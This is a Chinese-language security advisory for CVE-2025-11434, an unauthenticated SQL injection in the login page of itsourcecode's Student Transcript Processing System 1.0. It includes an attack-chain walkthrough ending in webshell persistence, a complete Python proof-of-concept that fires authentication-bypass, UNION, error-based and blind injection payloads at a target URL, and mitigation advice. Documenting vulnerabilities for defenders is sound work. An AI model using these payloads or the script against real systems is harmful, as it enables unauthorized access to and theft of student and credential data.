CVE-2025-11434：itsourcecode学生成绩处理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11434

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Student Transcript Processing System

漏洞概述

CVE-2025-11434是itsourcecode Student Transcript Processing System 1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于系统的/login.php文件中，具体涉及对参数uname的处理逻辑存在安全缺陷。攻击者可以通过远程方式，无需任何身份认证和用户交互，即可向目标服务器发送精心构造的恶意SQL语句，实现对数据库的非法操作。

该漏洞的CVSS 3.1评分为7.3分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），无需用户交互（UI:N），对机密性、完整性和可用性均存在低程度的影响。虽然单项影响评级为低，但综合来看，该漏洞的利用门槛极低，且漏洞利用代码已被公开发布，可被攻击者直接用于实际攻击。

itsourcecode Student Transcript Processing System是一款用于管理学生成绩单的开源Web应用程序，广泛应用于教育机构。该系统的安全性直接关系到学生个人信息和学术数据的安全。一旦该SQL注入漏洞被恶意利用，攻击者可以获取数据库中的敏感信息、篡改成绩记录，甚至获取服务器控制权限，对教育机构的数据安全构成严重威胁。

目前该漏洞的详细信息和利用代码已在GitHub等公开渠道发布，漏洞发现者通过VulDB平台提交了CNA报告。由于漏洞利用技术门槛较低，潜在受影响用户应尽快采取防护措施。

技术细节

该漏洞的核心问题在于/login.php文件中对用户输入参数uname的处理缺乏充分的安全防护。具体而言，应用程序在处理用户登录请求时，未对uname参数进行严格的输入验证和参数化处理，直接将用户输入拼接到SQL查询语句中执行，从而形成了典型的SQL注入漏洞。

从技术原理上看，当用户在登录表单中输入用户名时，前端将uname参数通过HTTP请求（通常为POST或GET方式）发送到服务器端。服务器端的/login.php文件接收该参数后，未经过滤或转义处理便直接用于构建SQL查询语句，例如类似如下的逻辑：

SELECT * FROM users WHERE username = '$uname' AND password = '$password'

攻击者可以通过在uname参数中注入SQL片段（如' OR '1'='1' -- ）来绕过认证或执行任意SQL命令。由于漏洞存在于登录入口，攻击者无需任何有效凭证即可发起攻击，且攻击完全在网络层面完成，无需本地访问或用户交互。

利用该漏洞，攻击者可以执行以下操作：1）使用UNION SELECT语句获取数据库中的任意数据，包括用户凭证、学生成绩等敏感信息；2）通过information_schema枚举数据库结构，发现更多攻击面；3）利用SQL注入的写入能力修改或删除数据库记录；4）在特定数据库配置下，利用堆叠查询或文件读写函数实现远程代码执行。

由于该漏洞的利用代码已在GitHub公开（参考链接：github.com/yihaofuweng/cve/issues/49），攻击者可以快速复现和利用该漏洞，安全风险较高。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过网络搜索或Shodan等工具识别运行itsourcecode Student Transcript Processing System 1.0的目标服务器，确认/login.php端点存在。

STEP 2

步骤2：漏洞探测

攻击者向/login.php的uname参数发送包含特殊字符（如单引号）的测试payload，观察服务器响应，判断是否存在SQL注入漏洞。

STEP 3

步骤3：注入Payload构造

攻击者根据数据库类型（推测为MySQL）构造UNION查询或布尔盲注payload，利用uname参数注入恶意SQL语句。

STEP 4

步骤4：数据提取

通过UNION SELECT等联合查询技术，攻击者枚举数据库表结构，提取用户凭证、学生成绩等敏感数据。

STEP 5

步骤5：权限提升或持久化

利用获取的管理员凭证登录系统后台，或通过SQL注入写入webshell，获取服务器进一步控制权限，实现持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11434 - itsourcecode Student Transcript Processing System SQL Injection PoC
# Vulnerability: SQL Injection via 'uname' parameter in /login.php
# CVSS: 7.3 (HIGH)

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
LOGIN_ENDPOINT = "/login.php"

# SQL Injection payloads targeting the 'uname' parameter
payloads = [
    # Basic authentication bypass
    "' OR '1'='1' -- ",
    "' OR '1'='1' #",
    "admin' -- ",
    # Union-based injection to extract data
    "' UNION SELECT 1,2,3 -- ",
    "' UNION SELECT username,password,3 FROM users -- ",
    # Error-based injection
    "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) -- ",
    # Boolean-based blind injection
    "' AND 1=1 -- ",
    "' AND 1=2 -- ",
    # Time-based blind injection
    "' AND SLEEP(5) -- ",
    "' OR SLEEP(5) -- "
]

def exploit_sql_injection(target_url, payload):
    """Send SQL injection payload via the uname parameter"""
    url = target_url.rstrip('/') + LOGIN_ENDPOINT
    data = {
        "uname": payload,
        "password": "test"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Request failed: {e}")
        return None

def main():
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Testing SQL injection on parameter: uname")
    print("-" * 60)

    for i, payload in enumerate(payloads, 1):
        print(f"\n[+] Payload #{i}: {payload[:50]}...")
        response = exploit_sql_injection(TARGET_URL, payload)

        if response is not None:
            print(f"    Status Code: {response.status_code}")
            print(f"    Response Length: {len(response.text)}")
            # Check for successful bypass or error messages
            if "Welcome" in response.text or "Dashboard" in response.text:
                print("    [!] POSSIBLE AUTHENTICATION BYPASS DETECTED!")
            if "SQL" in response.text or "syntax" in response.text.lower():
                print("    [!] SQL ERROR DETECTED - Vulnerability confirmed!")
            if "mysql" in response.text.lower() or "database" in response.text.lower():
                print("    [!] Database information leaked!")

    print("\n[*] Scan complete.")

if __name__ == "__main__":
    main()

影响范围

itsourcecode Student Transcript Processing System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）配置针对/login.php端点uname参数的SQL注入防护规则，拦截包含UNION、SELECT、OR等关键字的恶意请求；2）在Web服务器层面限制对/login.php的直接访问，或要求所有登录请求必须经过验证码验证；3）对数据库进行最小权限配置，限制Web应用数据库账户的权限范围；4）监控/login.php的访问日志，对异常高频请求和包含SQL关键字的请求进行告警和封禁；5）考虑暂时禁用该系统的远程访问功能，仅允许通过可信网络进行管理操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11434
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11434
3 Details https://www.cvedetails.com/cve/CVE-2025-11434/
4 VulDB https://vuldb.com/cve/CVE-2025-11434
5 Link https://github.com/yihaofuweng/cve/issues/49
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.327371
8 Link https://vuldb.com/?id.327371
9 Link https://vuldb.com/?submit.666746